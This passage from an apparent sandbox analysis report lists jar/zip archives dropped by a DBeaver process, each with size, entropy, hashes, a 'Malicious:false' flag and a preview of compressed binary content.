      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):322835
      Entropy (8bit):7.869217059055499
      Encrypted:false
      SSDEEP:
      MD5:B3A250B71787A4CCF7C4BD72A30F9F5B
      SHA1:1990982B95F8ED242EFB34CC20AE27FEDD003F1C
      SHA-256:6A8904C2D6E2C8A724AFCE826DB97582CA4CCC1652EA87F794B99074FB9B14D2
      SHA-512:4CDAB04307800E1282FDD3DAAA9762EF65E853966EF7AF6EC22C5192CF17A7B41F3ABA818490A36B0FFBBB97016772DE7BCB5D52ECE3909AC4339CDA4599194F
      Malicious:false
      Reputation:unknown
      Preview:PK...........V................META-INF/MANIFEST.MF..Y.....|.#.........m.w...@B @LB.... .Q._..*.]n......U%......5d...I...f.IY.........&p...s=.......7...d......u.d..{?.S....6....?....4$..%...~.........W.1w.,.^.(..C.eI......>.N.I.'E..t...7...w.C....?.0.# .......{....!BS...4_.!...%....*.......T./u.................s.3)..)....N.~=....#.}..f.....>..tNr.)......!.#}.....a.x.9.#}.....'V.e.K......Co.|..]..K..>K.$w.i......z..).*T.M7...$...#.Gz|./>O....8O.yY..H.v2....:^.[d.~.wb.G..I?o.7..y....._jP.I...jk_.....E.....j..U.....| ?...~.?...}..?Y..A}..x..l.bH.......o{gp4...6.}W.w...<.~...~.h.......5..&(............/.........G....,......2...>...[.S9]..._?y...\.....tN....Ox.. ....+.t.._..I...;(b..bx.c.F.d.:..!(D.G............<...M.|^...:.&.?q_.".?.pp.........Yv...|.2.m../mG..c...$.k._.E.c..H.!..1.s9.....V@.^..p6...j....^.......M...@sBl|..............f,.J...3...N...\ .c..N.".&.:...[t..W*..:Z{..&KZ.^s..H....CD+..p./...].L.7....(..O.......zyE..-...N..z.L.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):170094
      Entropy (8bit):7.881064030054251
      Encrypted:false
      SSDEEP:
      MD5:9F492C480B7BC1503F60121E25B5C04C
      SHA1:56935DB902A13F535E58D9ACF69057CEE576E7AC
      SHA-256:88D3474EF3E5ED75B4722BB88F5F33FBAB9118BB96D45DC53CAD92179A9751D1
      SHA-512:61415BE7EB63BDBE63D9906F12D074304CE54E378DD9E455F120C53581C81C9ADC4E4BC091AB03DAB07A7CE5B56D708DA654FD3402826659431465596CDB6713
      Malicious:false
      Reputation:unknown
      Preview:PK...........V................META-INF/MANIFEST.MF.[Ys.........)...=]}!."@......)v.......;.sb.v.9Uq.....<..E.........*...G.....g..@..?.V.e...F.W~B....t.%....z.9....M....._E..Z[......I.D..w.!..$r......s....G'/.G.-;..(...2/....~..v...A....!......./.....(.6r..;....h..'Y........T.......S........._y..GS.xzr........I..[+i......+3+y....._.....$......S6.L..3i...L2..>$f..+b^..m1O..A..m.s.....}.I.[Y.O..4....=.}v.....q....}.......q..]yek...$...$.J.....s..s.K..Y..y.zY...h...>...SG.S......"..)(.M...u.A...k.3...G...).o..^.e.W}.T9.. .?.u]T.Ap.=l.....>..U.yy.0}..w}...D..G.*.:...g.T.;PM...j+....+..$.....\Q-..#.D......`..}..0.&=..l.Aa.F&I.59..}U.........._T...D^..$VU.....?.0.....f?..w...2K.!I..s<.l~.....X..;p1....g..}.-P..".d.P.... .<..3.E..S..Gs.@..>..n-@,......k..."<...a5Q..y...I.....E.RR2.!8.G..:.H.zAc..YJ..F-.m.j..|...a=.;.x..L>.....z...?...B.]SX...#LpK}~(\.!...5t..6B.&...T........L.....OG.5TM.vd..`.Dt..........K..j.%..a.&.v.6../..{..t../.$/.].w$G.(U....V
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):294651
      Entropy (8bit):7.825176612345135
      Encrypted:false
      SSDEEP:
      MD5:6C24889F5CC015993DAC0FB4408E7186
      SHA1:06E8DCD7D590BD5C276718559664B5447D522BE4
      SHA-256:7EEFCF81D11C0AD66EB677DF1ABFF960F447EA825972E665C08DD633968E79AD
      SHA-512:6485D4F2DDAD834B1B0BAEB90EF1209AE050E499EB85C42CC094BE30A0D153DA2B80797D2A8302FF00D24BFFF6CE1369927054DA9985A873CDB2C459CF1B95B6
      Malicious:false
      Reputation:unknown
      Preview:PK...........V................META-INF/MANIFEST.MF..Y..H...>f.....>\........$@h..>\..}.I..@n.U..$U.R...r"<|...g..I....f.IY.........M.t...=....9..o...c...|./W.}...........m....?6/c..9{.Hr......*...x.D.s..........^.Tm..+....t...~RDo....F.....8.f.D@.......,...<.)...4.=y]zN.LN.4.h...;Te..!;...>.........-.v...E.W|k..j.^w...R.,.......I..M.d../t.6....;.#.......p<..4S.w.G.}....G9..6.yM.?....;.#}<1.S...o../x..uv.....i.x...]...?.<....n..y.y.......A.'M...~.\...r8......g%}Y.....C..A....}.....L.{IK.....f..G..!.fo#......dI7...&..v........n|7.y...?.i!....6J...y[....-+......k..S^.7...F._.zi.%..9?<h^.>.."&./V.e.|v.....lqL......7.9:...;.7....t.3s........g..Kx6..3.............7+z.F.....}..j..MPxA..o....%.q.U. x.;..../..QeN......=?...o}..|..+......uo.[......<...o..&!.?...x.....bF.^H..8F....>.`.K.......$...yG.._o..U\..@.u..wO.....5.w.R..Zh:O....7/s......?f....D.]..oV......:P.{.+..}......J.v.......r....?.d.A-.E`9.vy...K."W.[M.......r.5..5...c6.D.iP..c.S..}J.&...2.u+.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):97576
      Entropy (8bit):7.891801933392577
      Encrypted:false
      SSDEEP:
      MD5:4919EA1D4D3009D005188E8843315508
      SHA1:A8B3345C1848C363755E8EE83B1C86A97F56192B
      SHA-256:F24107358C4F76F424317E2CED1D86016E76EEDD70E5D8C983707EDEBDFB448A
      SHA-512:ED63D9B6DCD31DBCE78FC825A68F0E1556CE81D2CBBAEB06CBCD27DDFAC728352918A49FE7F19810C260DACCFEEF4D6346EC0EC6E9E10645ACB1BABA88D07D86
      Malicious:false
      Reputation:unknown
      Preview:PK.........M5W................META-INF/MANIFEST.MF.YY..L.......\L8%;Hw...""......,.".........m.R..<'.<y.sR..".T....U.g_..1....v...i..A.[.=0..F-(..1y.1m..{\z.^.wx..<..<J/6_M..C......(.&......O.<....y....DE..n^.18.%...o.U........y......1.....Q..Q.....O.2///~.y.y...U..It..'S.~......U........(.A...x.y.i)...#.K....k....b...z ....PSG..`.?^..i..MT..gR.Yo.du..o.3k.3....6F.1./|....~y..q.}"U....X.}._._.<....2.....d.....:.x.2!.}#:..{y.....y:...R.5..wk...}.y..t............~...kX.E.....a..&R...c..........?..........ya.zf..ny...`...._...%0...8.j.....L!$.{.M...'....E...^..........W.~..]....!&.x..s.&v5./.G. ..(.b..@*.....af...<]`.....I.!..O.QSf..|..w............7.v..bT..8..=.u(2j.....Q.....o..<.bw..k...H+i.<.+..i..E.R.E7.{......(...'..1>....O..s.Ne.u.qpik.....A.9J.)..|.3.N.._......L....u..a.>.V....Y8.._..i. .;.T4L.[.?r./....4$.k.m-..rb..%B.b".]H.../.zN...y..4.....w..~H..1..9.0i.....x#.<9.b.l.)...q.8.Y:1.[J.X..+.a..m.}.h..X..n.. ....q.OC._.gU...n.7P.........@. .$.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):119631
      Entropy (8bit):7.885729518846968
      Encrypted:false
      SSDEEP:
      MD5:F05D4E3837BC44392A47B201D1DCA191
      SHA1:AB0EA0DDAFB0781F6C63A2DF6A4130B3BB64E439
      SHA-256:1C0A593FDC33367E80C17F077A63041195F6060C34360B4FD76DCB22236CA60B
      SHA-512:49E7B78586B0AFB997F1C74186F08512093B4A07D444855FCD6449E91E10239AC0D235F80FAFADCD69560DC3F4BDCC330EA3D972869A3237AD54B71C944BB447
      Malicious:false
      Reputation:unknown
      Preview:PK........7N5W................META-INF/MANIFEST.MF.ZY...~?..?T.8....d...D=."3"..C.3(.L...1..[..Y..M..........[.Q..fX7iY|..=.....C....j..Ar...@.~..a.a....Aui.<...A.B.~..^+.,|.>..uI..O....?.W.uqZ\.|.E.s..R......C?K.&|..:|..,..(....C..q.............#...=..K.....X...........4.......f..OK=C...z..}P\...@..;?....1.-Tu...?..mX.n..../...Z..]Z..._@TwE...?...g.|.....0....y.....kF.3.:l.....o..s.1.l.i^........ph...!.W.l.fl.0..i.........>.$.....E.}Z.E.........p.U.k.|... .A.52.yu..._..'..|5,f.}.....8m?&m[5..`..t.D.|^.......|..-.\{......*.M>..|......Z7.t...-..%..?.y.r.'..C..1$.V~.....(.ca..(....$V....?..z./p...w....,.........&..y...].^..t....l2.%.`t..I.....\Ga...(S....p.t.(^&.!.TE.d........s.>.y..^.o.-p....R4^.)1m.bg.....\!.>.....Q.d..gV?g.v.F=]...Q..?...,.i...:..`.8@......aX@;x...+..;.jz..vwy36}N.o.f.i...x.r%....z..DvN.~..J#V=|.....E7...f=.m....fP0a........h..B.vEq.T...'..N....=.w...$......!4...p.....n....*.b.m...Z...k'..+5..vJ...lGA>..M.;9.z.../.......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):73981
      Entropy (8bit):7.8823221323283885
      Encrypted:false
      SSDEEP:
      MD5:AA32891F29BC1A11FA40BAF803CE3C7C
      SHA1:7A491E51EAE8F3DCD21704980C6D6415B38B88B8
      SHA-256:E08024842A115D178ECA9536E21D772219E3C1E8D5A030F8FF07594FCD365126
      SHA-512:66F32BB04408BC354153FB7D10CCB310151B09F8482C313B87A98F1ECD376E3AB23124E96033DF845623FC044E9DC87AA7BB7CF9987533CB19F9ED89FEDE6BAA
      Malicious:false
      Reputation:unknown
      Preview:PK.........bW................META-INF/MANIFEST.MF.W[s...~OU.Cj.>....E....(..........U.....q%+....2.t.7....#Y1.,..A..$~|.z.....+.NwT?>HV...&.=X....#{.........k...Q...AW....%..I."...CX.0>.....].B..#I...Cx.@.NR....du....C.c7.y..G...\.:...p..8..1..(...l.'.....v_.....X..t/..b8......EI.}w.S^.....~....?.=........#...0...#{....m..l.d..]....E.....k=.5.....M.C..].......~}..I.............e.}^...'.f.....n...t.W.z....b'I.d.y.7t.I.gR..8.h..0M.....h..1...c.|".zfy+..j..;...]..R../....\..]#)R..`.R.. {|..........A..^.;....{..|...65...k.v....{?.. {.!..e..H-......."8l......s..a.........M:(...>@irH....`........K..A#.x.s.._...B"B..1..&n.<...e.w..tq.......j.F..9....XF........LB.$..51....r...*..{t.{=..b.."\#.D.[...Z."~.k.m.V?9.....:.3...k.e..a..1rm2..u.7...N.Er...(l..L...}.G...Z...x..'aK.3.....qx..,...F..(T...}=...P...h.L..>..R.>........_K..a..PI.=L6.*..i..,..^.......R.....5X.."...z.`<.v........n...F.}.<......W_<x..d.d.uV^z...*....NW.....9...TF@D...R
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):118179
      Entropy (8bit):7.937671121536661
      Encrypted:false
      SSDEEP:
      MD5:CA54FC2E7323E9D0A9124F5863356622
      SHA1:D438E281B87F6BAF2632E634DFFDD5CE4944CB47
      SHA-256:C82B64FF33A236E8D1B6939D851EB41C8AFBF683098D471E0BF69FEE47E7BCB7
      SHA-512:119C0AF80972ED0F12763CE6A976702ABE9E8B759E67845F62668B5898DADA4A7F335E2B2E5551ACFAF98A40711D5D5BC9ADEFB12E514E1A724C1BBBB3A261CF
      Malicious:false
      Reputation:unknown
      Preview:PK.........1AW................META-INF/MANIFEST.MF.XY..J.~.....w.&.%..Z.. ..."..<L.$..I....v..j.r.L.wN..;)[i..=o.,.,}y...._&.X......I.j.>....5.OT....~.0v..n....i.c..R7...O.o".%.J...?........;.C.#.~.8q....d..]~.*...je.@....7$.......I....E<.I.}.1u3x..fu.........b..d....?..D..D..;.....Z.M.....M.?_.........V......Q{.e.V)...9|k%..a...o........|_.."..6......!x......R..Z!I.....R}s..o..z...'.#z.?[M..).S...S].O..fi.R..jK....O}..52.P.....y....^.`.:.........b...r...l...`...~............r.0.{..t..C.]....+.%......[..6....}z..:@... u@..T:.......|...9.....?.<...^?.j.d.~......~|.....]%.[U.}G....M.......Wg.h...x.p=.]cF..(....m.....=.o.F..}......[..NI.........<..6._....f-..&)R..9.I....f.i...9..F;...%....._u._.....PnKP.%.sb.,?..x.u..l...O.?.......).3..<..>NL.!.I`.>X.%.)......,.6p..`.5Y...f.c....*.?n....!3.*...k....Ab.....k....>.......|.)...OGa..I....oLnJ.Gm.^W.....P.E....xS17.Ml+..E6.W..9$...).y.i..q.DS......p...Vq'y..!.]'t.z.O76.65...)..e.e..Y.R.Z..p.J
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):50968
      Entropy (8bit):7.907770196850828
      Encrypted:false
      SSDEEP:
      MD5:AB709EFEE29E1E63DADC3944C6555490
      SHA1:CBAB5829346BE2FBB01C215EDEA96CC6EEDC2D57
      SHA-256:49B09515D65AEE6799DEADAE4D5B09C67E873FCCDF558F5FB4917B4E4C85B6A9
      SHA-512:1D87AD8378D296BA8019E5A994A6B88DB55300EF2F7F4A140A14B9DB012E74FE16090FE6180AC405DCD2C81547DE6024B5C0FA6CF11F3669E350DDE96F813647
      Malicious:false
      Reputation:unknown
      Preview:PK.........fW................META-INF/MANIFEST.MF.W[s.J.}OU.C*5.0.Q....<x......p.i.h.f......'..w..BY..k...Q...QL.KDb...'..>>t...Y.N.zR@...6..N.y.V....`.*...G..n..]`y....B..).Q.....b(M......H.|3.0.... ..(F...T..}.q.x...$...!.Z.g.J.|...z....j.......>.("........E`.~...R.....$...g@..........&.|1.L[....#..L...^.y}.3oE......O.......C.../....;~u.... ...@..p.*~..c...,..c..M.A..cJ.&v.....G.B...<p.....($.<.p..[....S.&8.R.z}.h..ra.9.wQ..O.5._.....+EH. .$.|....R........<hXVB+.J..E...MY....v-}.).~....R..-.....Y4...S.<@../.L....*..K....L..K.c.V../.8....l.Ho.!.}~)$..d.6..l....Z...j.4........4.....=><>\.}..)....09#s....@.?>.v....=......6}F...?L..^j"...CZ#.h...`.^4E...(.....aB+........Kg...^c.&....i.-&....v.......x.....".B.{g..r....=j.5..__{..'Du.K..^.[.y!........J..gw....V.5p..l.&.|.....a.{.........Q.......... .k.4...Tm...t.I.aD{.....M...s.*.#.......R..I1D...q)..h...S..v.SQ>qS.."3.....D.......|..H...G.-tW........@.Q}..u/[......^S...80;o~...y./..w.c
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):944270
      Entropy (8bit):7.946682880367784
      Encrypted:false
      SSDEEP:
      MD5:CCD8410AFD11C901B74C461338A1BC57
      SHA1:79B324502A4F70F253B5662035A2663690AC4B3D
      SHA-256:16B6805641F16BF7CEC7217D7F5D9C084DF8B430D5FF6467CB390F513B7AF011
      SHA-512:C3DB20957D5FF684F0CDADEAF4311F4944D621E372F0554129F80DFF2BA4FA645A8597F123F169DF2A56A80AF3FAA81C523736051C6C2FA5C36EF369B8DB5D89
      Malicious:false
      Reputation:unknown
      Preview:PK.........bW................META-INF/MANIFEST.MF....J.6:...........;z.0......3..o..p.GZ.jU....3.Zr.I.k..d.q.7._G.n."....7...k.n}....?$...?.....@.....c.......RK..ly}/.R./.m..C..?........L.0./...N.S.........n.....-j.[.7EW.~.?.8.S......~..}:...~...0.#.....$.~...qo.E}o.o.._...~.$..?.?e]....?=.X.v..v......X.u...v.v....y...~.....3.............?>...9.....O~......m..p{.O~xy.....1.e...8...........k?..Kt.UP..o....}....]..]...n.e.._wV....2..Q...[vY.@.}...=...V%...v..N..~......m..q...n.e...tm.>CR...m....}_.g.]Fz.. N/.ev.F..3.......H?..mC....v...~|....&..&*.{c......"8...C.....^...........U..._./.."....H4.......]..v/2.Ey..N._.?...^.h>..~..2.......~3].5....7..k...^..a.....O..&.<.B...U.\.Nj..?...u..._t..E~.t..c....x...E4..y..e.._+~x....oc...../...a.:...7W.#.mw..}..x...v..;...I.y..E..,Q.{[e...D.k....._R.u.5.m...?..(.0..n.7.n.x.N...t.....^....2....../s..........-......s.K..).*S.......3~......).6..?..z......+...e...../...........gq.{..}.tp.Y:.."q.$
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):81062
      Entropy (8bit):7.937788361292158
      Encrypted:false
      SSDEEP:
      MD5:38FC96F992F3E342C15AB0E0FFA2DD90
      SHA1:998199B2E8A225FE6EBFDC9ED93551444384212D
      SHA-256:9B74CAB502E99AF34FB395C1ACABDD5800AA2A8A08E146B96476D14C5C7E0E31
      SHA-512:D80F13101E582AE39BC0F7624336A0AC742C2AF601DBFDEA457C6F48E54600C2F698B8F5B107D829DF6207594C956AC6B4B4BD090427A2D5076AAA014DEBE107
      Malicious:false
      Reputation:unknown
      Preview:PK........j.bW................META-INF/MANIFEST.MF.X[s...}OU.Cj.>......T....7.B.......0.......h....\V..^...90!.%.......F..1....V.......Ml.(.....5...."...mU..U^..k.....y..... ......t......0[c..]..t.e..^..F:.....|d.."..A.Gq.kV.a..!A.|zHP..!)...N?.....).(C6.H4-.2@...@..@....Fm...D88_:.(..|T.........!.0.N....K...b...ah.......C.}........H..KWJ..1.N.x.......n.w).z..3.(.'........S^..+.G...S..d".4.H...!|..'.G.at(..A.^...%...:.k,..L....h%.'..&...%...9.q......C......_...W._.[.=$$.. ...Y"}......S..}....*.O..[............Z..T7....t..a.2.u.G...!..%..[I..R...5S..%...Fvz..k*R..i..E).........7.<....#E....<.b......C.PF....V+.?...?.Q..&.56?....6.,..H..?.."... M..i...0.o.R.YHK..K....39......\?iS...E....z..v....Y1.*.UR..]....O..u..3t..q~k...8...!...#@..S..MO.,.$.Wc.{.H......E...#..c..\}J..q4......w...O}(,.$....I.....K.~....Z......^...bj...ZN...&...#}.....6.gZ..P..5......@n.V4Y9...c..x.,.P..v....e..&kQ|,..x.`J]3F&..X...:iBs...e.>C6.f...$.&...y...Z.7`.#^C...e.u....m
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):38432
      Entropy (8bit):7.850020866333127
      Encrypted:false
      SSDEEP:
      MD5:7543714CFF0C734877C9C59EB13F68CA
      SHA1:F3D896D96C9404B154B7ED8DA1D5E608E215C1E3
      SHA-256:6D91BF01CFAA4DC85A2EF2510DE264FEF796D0AC16881A1FBD0A22DFA1341ED5
      SHA-512:E989BE3ABD07131F29FBA37B5EA5F43E82561624D69AE9EDA1978008F6771A124960D3CFF86FC9B7BBB8B4C7BD5A26DE36F9B1CCC91ACDB6839FCE759E394263
      Malicious:false
      Reputation:unknown
      Preview:PK........Pa/W................META-INF/MANIFEST.MF.W[s.V.}.L.C&.>t.r..d. b."."D.C....r.p....cb...i...^k.}9[......!*.,......U.A....w7:.`z.Cn.U..m.xB*..ki.e..m....aK..y6... .w7..q.D...c..'.#.t"CA..q....f..+."....).4.!n.?`T.m..wd.PT.b(..D....>..8....g0m......J........<.~.b.. ......_..vy.p......y...........On..\....@..j..e.`.D...T.8J.sbZ..z...m3b......o....9c...$B.....+.7.A.<...U..4.)...@..A....gIc.m.W.s..^......3.C.S..w7.......1.;.l~....H.Wc.<....q........S....}.p.p..M^.r{.A.p.6.^..kQ.C..7.I.U.fY.u)..v...x......)_....B..t.......%.p...Tm...-..4..1. j.1(.iL..b8.%GASaMq.`C..QaB5H...5...T.S3.".b....".\>|..-..Q9.....I....<..X....'v2....&1I..P!..(x.L....p...C..?[...$.X.M..H..4.....>...P....{.,.......;)..Vz.ncf...>.,F.,.....A.<.v?..].L..>.&.%m`....y;~1......}.e.9..xU.......o..+.S.D.....s/w.o..f.H.NJq...j.......3.Q_..!3GQ.az9-En.<..;.=..S.@.j..$........+A.....fZ..{..4.y..*['.`..!?/.]I..N.....i...`&V......y.....E....lW"._..sv.90.l.$....Ea.'EW....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):54246
      Entropy (8bit):7.862552069470027
      Encrypted:false
      SSDEEP:
      MD5:C2B2524A17F9AA34DB57685E8C804B8C
      SHA1:220D7CDAE6F94F6A37708884C88D1684A6F705BB
      SHA-256:BFF0647439D38E17FF124841EEF4B6519DEC4BD4986FA11ACAFEE1207193FC8B
      SHA-512:61480AF6F5961B2753B3BC9E4E9C3AD348735AFA14BA2CA3E2B8735E1079515E9F6DA28C194B1FA490699BCC26FAA88BDE8F2FC1948B833EE88FC31923D5FC96
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_zh.properties.Y[o.6.~..00.h_\..6.!K.eC......(.t..@Si._?.2.%Er.6{.b.....~d._.U........|...\T..y.J........S...m.SY,.(.z-..^...E....|%..6L..>...6.E..JD..7........:...*/...Ce.!....~.L.R-....F...Gi....*U.l47...M-...I.C.E.}...)K.B.V........4.-%.Yb0!l.6.4..^f..#4L.uD(.....4F...j......Dd..u...&V....]U.|..b...H=...B.....X....t..U]is..E^....,.as..%.3 v.p$B..,..!<...?.Vk.. [x-.TZ/J.6...>..W.X.J...t...1...&d..a......0..0{........R.E..........C...O.$Q...I...#..ya.....M.j..........$.v.....ax^J.*.L.k...;.y.kn.a55....2......r.*M 5..L7.o..^...f..Y......7.O...p.....Z.a.......@.....I......I..r..]..8....#.....vY...8...<.y.8...D...a.....(..#.B...Y....)./.Q...V)dd.,..o..g....^..s.9..*us....# mJ.P6w.....<.J..0s.#...........$8?................f.k" ..n.d..R...X.....Rd...S...B:.....c...ng.MW.h.3,....>.p..p.{9.v&g.J..N.}Z...`.....a.C..b'.Q...B...|jI.7.....,]..d./..H.d.|.Mh.....H:...r; ..0.\c..r...r?.~,....*.'J.?N.d..a.`
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):410681
      Entropy (8bit):7.897055133221583
      Encrypted:false
      SSDEEP:
      MD5:638F62F0F6F8C643CAC1D48F28D05C26
      SHA1:D1739B214C1C5BC224830874B08E6F4E9CD1CC6B
      SHA-256:A3C6AE8FAADF7646CD532F695C294A9A5F9EBED9F6974600F62787162F262F55
      SHA-512:9ABA3464E7F32F246FA2E736F5A64AE817E48CA7689784A6271477DF531C682A94AC93381D16987A9A839E5E275E772FFFC0FAE0D09E645414B5F8A5171B795F
      Malicious:false
      Reputation:unknown
      Preview:PK.........BVW................META-INF/MANIFEST.MF..I....6.....h;...3...S.;.@.M........,....YUY]I&t.MU"P.+...=\..L...0..M..../..g..n...l.?.;.CP..n.8...7.......l.$..........m..Z......1.............:..}...:..*O.._TM.%..n./~p./^.....M.(.........B........0.#..C.@..|........._...W..._..[.O.TC...O.......v_)._oe..j.?$.....#...*..(..o........O....{..U.xA^UY_...u..~v.RvnR^..Q.......w..?..a.\.......}....).2.u.._..[.y.~).).o....R....}y..2..>...V..........#.#}}..G....?....=>.....U..~....7..c...x.......}.>....|...O.0...n....?.O7~.>..G..}........u.&xy..?....^...... _ ........~.......9.n..M.|....e...7$|[e.|........."x.f..........u.......z7...nw_......K:.c.j..O.......].._....L...~.C.Te.........7.......q....=x_.]U..?.{..a...u......?...3.........&...@...Us.p}...].r...j........S...tn...s?L.u....?75.t.._..@.E.......... F@.........8.^.._.../...T\5....1..:....j(k........L.......Qj5E..Pn..#........{j..q...p{.....vU.^.}.........."w....S...t.t..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):666250
      Entropy (8bit):7.925859206455044
      Encrypted:false
      SSDEEP:
      MD5:03DE611D74A5C2B5F71B504D24173B60
      SHA1:AF8EA883BE3ECFBF9D874A159EE465080EB13087
      SHA-256:C966A3FED68347B52D3BE321C0B9D9139C58DE2BB47B12D59FB61A1CF930DF51
      SHA-512:0CDF8FAEF1FF32794E340F5F0547B8869C8FDFADD75BAF10BBC41B3B2CC06660DC1167A9EB6AFE81DF00148838664498025F2512BCBE93D4EB7953599F8DE4E2
      Malicious:false
      Reputation:unknown
      Preview:PK........l.vW................META-INF/MANIFEST.MF..G..H...o...m.j..5.*h.m.. ....A..x.-.Eh..."RTfW2.wfQYA2...~.w.+^..Q..nGm...?......ol.y}...,....Q.....l... ..o...Y.......&..?#...".].......ze...._z1$Y.G.......~]d.._...((.....[o...uY..Q.=..};..... .@.......0.A0..(..Ua..I.i.1..V..K.u.......l.....;.M....^.._~.....H....v.....?|.zM.....H..O.>j+...=..o..l.~.............>..0.~.Wk]....P...A]............C.F.........._.z.rn................._....."....n..}........~B...l.Zx.....C_.....J............zh.... .....(..d.?.o.....s:..l...>.H......{.?...W......._...Y/..&...p.0$. .C=".}..B".^oOB...}....A.k.....YwI.G..+........_......Eo......o[...........o.......w........J..............k...^.U.Om..........a....6~....S-.=..i...`....9O9.......~.....p..../..U..o'l.....(...W..T.1c.pV...V.....^..<..3Lx.S...?....:..h.t.h=0...:`WnD...*....T(.b.N.`.W'...|L.~_..u}T.^ZG..!p+A.....dFZ.......{......NY2..o..l[..}.g..*.A.]s(.sv...p..../6..Sq..........".5....Pl.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):30056
      Entropy (8bit):7.836644598805433
      Encrypted:false
      SSDEEP:
      MD5:2C09B52760E4564AE83C5B8B71593601
      SHA1:99DB577AEEB8C157559E705310FB7E9A047B8D2B
      SHA-256:AC42EF9AE6AE7773A64A9BE246A2981D9C801EE573CA0A1972E634EE6936F6AF
      SHA-512:5E11C95CF4042A5F349CD832AA01F8813E0767DD5AA1361111023B9CF15CF734B4AF1D66B004CC275B5079A8D1D3B39ECEE2A73211BCA1AF281F3F7E21A19668
      Malicious:false
      Reputation:unknown
      Preview:PK.........YhW................META-INF/MANIFEST.MF.V]s...}OU...:....h*.D.#...Q9...h...6....4.8q&.d./F{.^k..{wZ.(.`.Q.!N...k....t0..t..}........?( .5h..no.. t.'wC..tH.T.!7....y...!s..q.8...v-.k.:a..........(..M....C........qJ.O....U?....1.b8.....8v@..@v.tJ..z>=G.,K.<.78..).m..}......ZB'..TT.8F.DY....`.Te.0Jb.Q...5...6.g.....Q.}q.|...'........m...tnoj..N.....]..Q. ...]1.u.,......GiP..,%H..S....).......t.b_.;..[J.. F ./)....i...<.....m.........B.9....k..SQ..FB(._M..Ou.Q....o.....C.n.K"K.h.p.'..NL:...fj...p.c>..l..9..n...8....#..K.Q.....;..b....gqD..J...<..q.gG!8.........4.).2..;.....6j.R'j....gY....|.s.Bf^.$....j....m..<I.O@.?...~...}....J..y.Y.e...A6t.D..<Y...r@.$.k..oC`;@..I..2....9..&...S.2o..z.:. %....."...."m...<s...[.n........+..z.\j.|.^.u'...........r?#J.m....5%..U.$....2...N..C..MA.)._<.[.2&.T........../....y7...c./. ;<..S..z...L.g.W.Oc.6........5...b20..o....'h.Bf....5~...Z.*.zI...7.f...Kq.X.$....z.:.K..k.....R.e.../...v4.......e......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):58044
      Entropy (8bit):7.875835019013845
      Encrypted:false
      SSDEEP:
      MD5:7714BD87DE0E403A5DD8252198884EC9
      SHA1:52A2D0647D62634F7A6F01A3F79B0AF004390EB6
      SHA-256:9068A1B798062924D589EEC73648A05A3E98403D9D1B420D6EF723811B3A13DB
      SHA-512:CBE640E2786EA51F93EC3C8CD1B11EBEFD3DF84FF1951C43B2BC6B8E6C3967194A06AA55507456D199FF0469E18B6146BDAAB3BB8B28A2BAB285250D358688F7
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cW................META-INF/MANIFEST.MF.XIs.H..;....xs..A.../|. @.....0........G./.nc....PU._...BT=x...o....==P...n....Q..O.....E.......N......1.a....1.Z.......7H.mK.].w....xz.......4@...........\...F.$..M.M.".u.../.....^.p...>....@.._vg..:.P.Y....&.c....w..G-...%.c.@."..).|.y.7...q..y.D....?=.j.*\.r!..>.uY.m.,qO..".6.w.:..\......A6.?.....8.......E.:......D.s&.......Qq.#.6...K.#.JO..F...]:.(.zin....F.]....~....P..A^...W<^.a).J.......2.....G.p....^......-,A_7..1..l.}.L....F..t.'2w.+~.t..G......!..'..'.. z"...k.Q.x......>..J....k.R.g.b....... .s.E.g....HX5.....DuI..g...7...j..N......d.1.@..i.E.H.h."5..........."*..B......H....Q..e...v.>.f.....'q..V.?..%.Y.U.H...N....I.1...~.?...5z.D.../4.@...p...TJ.|.fK.+!m.pO.G...4.w..M.{E2C....d;q..F.e.0.rY..p...c..6....h}?`:p....k.A..O...3.5.`..`..kY*..n..s..2..?.>.g.Kj..h.(..<...Z.~...k....3....?.[.Y.H3....g.1.:..g'....0c.,p{T{..X-.......&.\k.9...2D....Dt.B.W.{,.p....6....z...[....#....I.A.=.:..T
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):14197
      Entropy (8bit):7.691613931079519
      Encrypted:false
      SSDEEP:
      MD5:CFB9987FEA8D341D564450502156E7DE
